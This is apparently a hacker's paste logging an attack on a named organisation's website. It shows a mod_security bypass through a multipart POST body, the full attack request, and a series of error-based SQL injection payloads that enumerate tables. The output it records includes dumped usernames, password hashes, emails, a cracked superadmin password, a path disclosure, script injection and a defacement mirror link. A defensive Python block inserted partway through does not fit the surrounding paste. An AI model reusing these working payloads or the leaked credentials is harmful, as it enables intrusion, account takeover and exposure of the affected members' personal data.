It's protected by mod_security in a very annoying way.
With the $_GET method it's not possible to get the injection through.
But with the $_POST method we hammered it like below)
|SELECT user_name, password FROM `members` WHERE user_name='sikdirde' order by 10-- AND 9='9' OR password='sikdirde' order by 10-- AND 9='9'|Unknown column '10' in 'order clause'
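The preamble above says the injection was blocked in $_GET but went through in the multipart $_POST body, and the error line shows both form values concatenated straight into the members query. The Python below is added here by the editor and is not part of the paste; it shows the two defender-side consequences: request inspection has to cover multipart part bodies (the small parser and signature check stand in for a WAF rule), and the actual fix is the parameterized query, which treats the page's "' order by 10--" probe as plain data. The boundary, the user_name / password / 3_any_small field names and the probe value are taken from the request above; the members schema, the user alice and the regex are constructed for the example.

```python
import re
import sqlite3
from typing import Dict, List, Optional, Tuple

# Constructed sample body, shaped like the registration request above: same
# boundary, the user_name / password field names, the empty file part and the
# page's "' order by 10--" probe in the password field.  Real bodies use CRLF.
BOUNDARY = "---------------------------265001916915724"
PROBE = "sikdirde' order by 10-- AND 9='9"
SAMPLE_BODY = (
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="user_name"\r\n\r\n'
    "alice\r\n"
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="password"\r\n\r\n'
    f"{PROBE}\r\n"
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="3_any_small"; filename=""\r\n'
    "Content-Type: application/octet-stream\r\n\r\n"
    "\r\n"
    f"--{BOUNDARY}--\r\n"
)


def parse_multipart(body: str, boundary: str) -> Dict[str, str]:
    """Split a multipart/form-data body into {field_name: value} for text parts.
    File parts are skipped.  The values to inspect live in the part bodies,
    which a rule applied only to the query string never sees."""
    fields: Dict[str, str] = {}
    for part in body.split(f"--{boundary}"):
        if part.startswith("\r\n"):
            part = part[2:]
        if part.endswith("\r\n"):
            part = part[:-2]
        if part in ("", "--"):  # preamble before first boundary / closing "--"
            continue
        headers, _, value = part.partition("\r\n\r\n")
        name = re.search(r'name="([^"]*)"', headers)
        if name is None or "filename=" in headers:
            continue
        fields[name.group(1)] = value
    return fields


# Stand-in for the kind of signature the WAF applied to $_GET on this page:
# a quote followed by an SQL keyword, or a "--" comment marker.  This is a
# compensating control only; it does not replace parameterized queries.
SQLI_PROBE = re.compile(r"'\s*(?:or|and|union|order\s+by)\b|--", re.IGNORECASE)


def suspicious_fields(fields: Dict[str, str]) -> List[str]:
    """Names of form fields whose value matches the signature above."""
    return sorted(n for n, v in fields.items() if SQLI_PROBE.search(v))


def unsafe_login_sql(user_name: str, password: str) -> str:
    """Build the statement the way the error on this page shows it was built:
    both field values spliced into the SQL text.  Deliberately vulnerable."""
    return ("SELECT user_name, password FROM members "
            f"WHERE user_name='{user_name}' OR password='{password}'")


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the members table (constructed fixture;
    credential storage is outside the scope of this example)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE members (user_name TEXT, password TEXT)")
    conn.execute("INSERT INTO members VALUES ('alice', 'correct-horse')")
    return conn


def login_safe(conn: sqlite3.Connection, user_name: str, password: str) -> Optional[tuple]:
    """Placeholders ship the values separately from the statement text, so a
    quote, keyword or comment marker in a field is only ever compared as data.
    Both fields must match, instead of the OR seen in the observed query."""
    return conn.execute(
        "SELECT user_name FROM members WHERE user_name = ? AND password = ?",
        (user_name, password),
    ).fetchone()


def demo() -> Tuple[List[str], str, Optional[tuple], Optional[tuple]]:
    """Returns (flagged fields, exception class raised by the unsafe path,
    safe-path result for the probe, safe-path result for real credentials)."""
    fields = parse_multipart(SAMPLE_BODY, BOUNDARY)
    conn = make_db()
    try:
        conn.execute(unsafe_login_sql(fields["user_name"], fields["password"]))
        unsafe_error = ""
    except sqlite3.Error as exc:  # the probe breaks the statement, as on the page
        unsafe_error = type(exc).__name__
    safe_probe = login_safe(conn, fields["user_name"], fields["password"])
    legit = login_safe(conn, "alice", "correct-horse")
    return suspicious_fields(fields), unsafe_error, safe_probe, legit
```

Running `demo()` flags only the password field, shows the concatenated statement failing with an SQL error (the same class of leak as the `Unknown column` line above, here from sqlite), and shows the parameterized query returning no row for the probe while still matching the legitimate credentials.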
=========================================================
http://arm3a.org/index.php?go=registration&lang=en&act=insert
METHOD POST:
=========================================================
HEADERS:
Host: arm3a.org
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/17.0 Firefox/17.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Cookie: PHPSESSID=nrmdlu0n9scltvegj96idg1fj2; __utma=78176324.467657248.1354401113.1354401113.1354401113.1; __utmb=78176324.17.10.1354401113; __utmc=78176324; __utmz=78176324.1354401113.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CircleCookieTest=1
Content-Type: multipart/form-data; boundary=---------------------------265001916915724
Content-Length: 3019
=========================================================
REQUEST BODY:
-----------------------------265001916915724\r\n
Content-Disposition: form-data; name="first_name_en"\r\n
\r\n
'\r\n
-----------------------------265001916915724\r\n
Content-Disposition: form-data; name="last_name_en"\r\n
\r\n
'\r\n
-----------------------------265001916915724\r\n
Content-Disposition: form-data; name="patronymic_en"\r\n
\r\n
'\r\n
-----------------------------265001916915724\r\n
Content-Disposition: form-data; name="gender"\r\n
\r\n
1\r\n
-----------------------------265001916915724\r\n
Content-Disposition: form-data; name="residence_country_id"\r\n
\r\n
7\r\n
-----------------------------265001916915724\r\n
Content-Disposition: form-data; name="title_en"\r\n
\r\n
'\r\n
-----------------------------265001916915724\r\n
Content-Disposition: form-data; name="email"\r\n
\r\n
aaa@aaa.com\r\n
-----------------------------265001916915724\r\n
Content-Disposition: form-data; name="mobile"\r\n
\r\n
'\r\n
-----------------------------265001916915724\r\n
Content-Disposition: form-data; name="is_subscribed"\r\n
\r\n
1\r\n
-----------------------------265001916915724\r\n
Content-Disposition: form-data; name="user_name"\r\n
\r\n
sikdirde' or (select floor(rand(0)*2) from(select count(*),concat((select concat(tabLE_NAME,0x7c) FROM INFORMATION_SCHEMA.TABLES where table_schema=database() LIMIT 1 offset 80),floor(rand(0)*2))x from information_schema.tables group by x)a)-- AND 1='1\r\n
-----------------------------265001916915724\r\n
Content-Disposition: form-data; name="password"\r\n
\r\n
sikdirde' order by 10-- AND 9='9\r\n
-----------------------------265001916915724\r\n
Content-Disposition: form-data; name="password_copy"\r\n
\r\n
sikdirde' order by 10-- AND 9='9\r\n
-----------------------------265001916915724\r\n
Content-Disposition: form-data; name="charter_accepted"\r\n
\r\n
1\r\n
-----------------------------265001916915724\r\n
Content-Disposition: form-data; name="content_en"\r\n
\r\n
\r\n
-----------------------------265001916915724\r\n
Content-Disposition: form-data; name="tmp_date_birthdate"\r\n
\r\n
02-12-2012\r\n
-----------------------------265001916915724\r\n
Content-Disposition: form-data; name="birthdate"\r\n
\r\n
2012-12-02\r\n
-----------------------------265001916915724\r\n
Content-Disposition: form-data; name="personal_phone"\r\n
\r\n
\r\n
-----------------------------265001916915724\r\n
Content-Disposition: form-data; name="personal_address_en"\r\n
\r\n
\r\n
-----------------------------265001916915724\r\n
Content-Disposition: form-data; name="expertise_areas_en"\r\n
\r\n
\r\n
-----------------------------265001916915724\r\n
Content-Disposition: form-data; name="experience_en"\r\n
\r\n
\r\n
-----------------------------265001916915724\r\n
Content-Disposition: form-data; name="speciality_en"\r\n
\r\n
\r\n
-----------------------------265001916915724\r\n
Content-Disposition: form-data; name="scientific_degree_en"\r\n
\r\n
\r\n
-----------------------------265001916915724\r\n
Content-Disposition: form-data; name="university_en"\r\n
\r\n
\r\n
-----------------------------265001916915724\r\n
Content-Disposition: form-data; name="school_en"\r\n
\r\n
\r\n
-----------------------------265001916915724\r\n
Content-Disposition: form-data; name="hobby_en"\r\n
\r\n
\r\n
-----------------------------265001916915724\r\n
Content-Disposition: form-data; name="3_any_small"; filename=""\r\n
Content-Type: application/octet-stream\r\n
\r\n
\r\n
-----------------------------265001916915724\r\n
Content-Disposition: form-data; name="save"\r\n
\r\n
Save\r\n
-----------------------------265001916915724--\r\n
==============================================================
payload:
sikdirde' or (select floor(rand(0)*2) from(select count(*),concat((select concat(tabLE_NAME,0x7c) FROM INFORMATION_SCHEMA.columns where table_schema=database() and column_name='password' LIMIT 1 offset 0),floor(rand(0)*2))x from information_schema.tables group by x)a)-- AND 1='1\r\n
For now, the tables of interest, i.e. the ones that have a password column.
offset 0 ====== 123_users
offset 1 ========= members
offset 2 =========== members_backup
offset 3 ================= organizations
=============
sikdirde' or (select floor(rand(0)*2) from(select count(*),concat((select concat(count(*),0x7c) FROM 123_users),floor(rand(0)*2))x from information_schema.tables group by x)a)-- AND 1='1\r\n
6
=============
sikdirde' or (select floor(rand(0)*2) from(select count(*),concat((select concat(column_name,0x7c) FROM information_schema.columns where table_name='123_users' limit 1 offset 6),floor(rand(0)*2))x from information_schema.tables group by x)a)-- AND 1='1\r\n
id
full_name
user_name
password
email
is_banned
rank
concat(id,0x7c,full_name,0x7c,user_name,0x7c,password,0x7c,email,0x7c,is_banned,0x7c,rank,0x7c) from 123_users
=============
sikdirde' or (select floor(rand(0)*2) from(select count(*),concat((select concat(user_name,0x7c,password,0x7c) FROM 123_users limit 1 offset 0),floor(rand(0)*2))x from information_schema.tables group by x)a)-- AND 1='1\r\n
lilitkhalatyan|b7712161f4025c30f88ac2fd3e43f947
suro@itnet.am
kopaloni|2045f9c08a7676957e61e683658b2acd
superadmin|4820ae2c8b5bca80656829e47e1ee0a4
AnnaSayadyan|4a3f0aa47a96eb616286c626b4a9d36d
animkrtchyan|b53599f87d9d0417b569c4a51288f764
annag_at_mail_dot_ru|ed9fa1fb3337ef5a871e0302d6f1f5c6
========================================
sikdirde' or (select floor(rand(0)*2) from(select count(*),concat((select concat(user_name,0x7c,id,0x7c) FROM members limit 1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- AND 1='1\r\n
gagikkarap
gagikkarap 44444444
gagikk@cit.am
========================================
Login: superadmin
pass: arm3a
Can't find the admin panel, Fuck off)
http://arm3a.org/members.php
Path disclosure:
/usr/local/www/apache22/www.arm3a.org/data/members.php
==========================================
table: members
given_email
email
ITIN
password
user_name
rank
is_logged_in
There are 485 members.
sikdirde' or (select floor(rand(0)*2) from(select count(*),concat((select concat(column_name,0x7c) FROM information_schema.columns where table_name='members' limit 1 offset 84),floor(rand(0)*2))x from information_schema.tables group by x)a)-- AND 1='1\r\n
The offset above is the last one in this table.
Users have plaintext passwords)
Went into the profile and html/script got injected, Fucked)
http://arm3a.org/?lang=am&go=members
http://arm3a.org/?lang=en&go=home http://zone-h.org/mirror/id/18683315
If anyone finds the admin panel, good luck to them, let them nail that server.